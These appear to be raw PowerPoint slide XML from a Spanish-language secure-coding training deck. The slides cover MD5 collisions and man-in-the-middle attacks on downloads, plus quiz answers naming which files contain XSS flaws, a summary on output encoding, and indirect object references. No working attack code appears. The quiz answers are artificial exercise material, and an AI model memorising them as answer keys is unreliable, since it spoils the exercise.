                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031ED456-98F7-5547-EA54-E7302587F5A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3977343" y="4386323"/>
            <a:ext cx="1007311" cy="120938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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>colisión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> de MD5</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Google Shape;212;p18" descr="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E17C9E4-54C8-52AF-617C-96FA86E9A7E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="61895" r="2089" b="6903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331636" y="4743003"/>
            <a:ext cx="718458" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;213;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAE4F329-FA11-DCC7-03A5-5FB9B2F3184C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241804" y="5595711"/>
            <a:ext cx="2090215" cy="64629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C00000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>MD5(Malware)=1234</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;214;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E9B5AB5-040C-387D-8A06-66CA05893596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679318" y="3142044"/>
            <a:ext cx="2034963" cy="92328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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Servidor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>descarga</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>inseguro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;215;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82465859-58B1-872A-8567-0833ACB9CC71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213804" y="4446190"/>
            <a:ext cx="864300" cy="923400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="45700" tIns="45700" rIns="45700" bIns="45700" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Google Shape;216;p18" descr="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A755397-0339-17CF-F17D-0F7E798DEACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3029557" y="4774717"/>
            <a:ext cx="718458" cy="872838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;217;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74241E1D-39BF-C6BD-B61F-050087CED338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103119" y="132751"/>
            <a:ext cx="9645537" cy="132556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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>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s-UY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uso de algoritmo criptográfico roto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Google Shape;218;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D84BB2-F58A-6466-2FD3-1261B0574596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232199" y="348224"/>
            <a:ext cx="1467952" cy="338463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Google Shape;219;p18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82173CA2-7E8C-91F2-1941-7FD5DE64191F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6429107" y="1314579"/>
            <a:ext cx="5819507" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Los algoritmos criptográficos se ponen a prueba constantemente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>El algoritmo MD5 posee problemas de colisiones conocidos y en la actualidad es posible generar dos archivos que posean el mismo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>checksum</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Graphic 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990F25A1-F8F7-31D9-D043-B6AF2C7CE2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78649" y="3429000"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36616191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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>bottom.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="6600" dirty="0"/>
              <a:t>(Los datos son incluidos en un atributo HTML peligroso)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33030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B01135-261A-1E4F-8E34-47CB8DC0714D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4730" y="485014"/>
            <a:ext cx="12196729" cy="5585261"/>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2591489"/>
            <a:ext cx="12192000" cy="279024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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4731" y="5423769"/>
            <a:ext cx="12192000" cy="280102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF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51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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>top.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(Código es ejecutado dentro de una función peligrosa, siendo de hecho un ejemplo de una inyección de código)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424297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CAB48D-1309-0142-9197-D87FC0D485D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="869949"/>
            <a:ext cx="12183438" cy="5155069"/>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8562" y="2190656"/>
            <a:ext cx="12192000" cy="279024"/>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95249" y="4321479"/>
            <a:ext cx="12039389" cy="280102"/>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71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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0" err="1"/>
              <a:t>bottom.jsp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>(La entrada está siendo reflejada dentro de los tags &lt;script&gt;)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210166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216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0"/>
              <a:t>En resumen…</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type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XSS es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fácil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> de introducir y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fácil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> de encontrar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>codificación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> debe ser aplicada para todo contenido generado en el servidor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Se requiere también la codificación de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>comillas simples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Atributos y funciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>peligrosas de HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>deben ser manejados con cuidado o evitados</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235852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A5BF-0BA2-654A-A4BD-1C01C72AD1B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Referencia indirecta a objetos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67" name="Group 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB3D9AE-A19D-F642-B2A0-34AEFFE2CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2910869" y="1814914"/>
            <a:ext cx="5001427" cy="3734772"/>
            <a:chOff x="825591" y="1703402"/>
            <a:chExt cx="5001427" cy="3734772"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="495300" dir="840000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="15000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1FAB00-A9D8-5940-AA7A-0297A57EBFF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="898743" y="1703402"/>
              <a:ext cx="914400" cy="914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638C01-3890-3248-8FF9-1059E7972978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4912618" y="3125162"/>
              <a:ext cx="914400" cy="914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C87E056-E4A2-8948-BE74-D8DC0F00C536}"/>
                </a:ext>
